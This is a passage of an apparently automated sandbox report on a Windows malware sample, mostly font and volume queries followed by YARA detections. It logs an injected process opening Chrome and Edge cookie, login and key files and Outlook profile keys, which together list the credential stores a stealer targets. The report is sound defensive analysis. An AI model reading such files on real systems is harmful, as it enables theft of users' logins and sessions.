                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match, File source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0.2.dGHiTqj3AB.exe.72b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.dGHiTqj3AB.exe.2cf513c.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\mcbuilder.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                  Remote Access Functionality

                  Source: Yara match, File source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
